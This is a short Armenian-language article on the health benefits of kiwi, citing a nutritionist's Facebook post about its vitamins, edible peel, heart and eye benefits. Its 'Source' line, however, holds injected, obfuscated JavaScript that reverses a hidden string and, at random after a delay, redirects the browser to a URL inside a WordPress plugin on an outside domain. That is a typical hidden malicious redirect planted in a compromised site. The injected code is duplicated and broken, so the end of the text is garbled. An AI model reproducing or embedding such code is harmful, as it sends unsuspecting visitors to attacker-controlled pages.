Կիվիի օգտակար հատկությունները

Մեր օրերում կիվին համարվում է ոչ միայն ամենահամեղ այլև ամենաօգտակար պտուղներից մեկը՝ պարունակելով բավականին մեծ քանակությամբ վիտամիններ։ Սննդաբան Սվետլանա Ֆուսը իր ֆեյսբուքյան էջում բացատրել է, թե ինչու է պետք ավելացնել կիվի սննդակարգին։

Նախևառաջ կիվին հարուստ է C, E և K վիտամիններով։ Վիտամին C-ն կարևոր է օրգանիզմի համար ցանկացած եղանակին՝ մանավանդ ուշ աշնանը և ձմռանը։Այն խթանում է իմունային համակարգը, մասնակցելով կոլագենի սինթեզին, նպաստում է երկաթի կլանմանը:

Հատկանշական փաստ է, որ կիվիի կեղևը, որը մեզանից շատերը նետում են, պարունակում է ամենամեծ քանակությամբ սննդային մանրաթելերը։Հետևաբար, կարելի է կիվին ամբողջությամբ ուտել՝ առանց կեղևազատելու։

Օրական երկու-երեք կիվին կարող է օգտագործվել սրտանոթային հիվանդությունները կանխելու համար: Այն օգնում է իջեցնել տրիգլիցերիդները արյան մեջ:

Կիվին լավ է տեսողության համար: Այն պարունակում է երկու կարոտենոիդ, որոնք կարևոր են մեր աչքերի առողջության համար և կանխում են տարիքի հետ կապված տեսողության վատթարացումը:

Աղբյուր՝ $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolog-nazvala-poleznye-svojstva-kivi” target=”_blank” rel=”noopener”>Ivona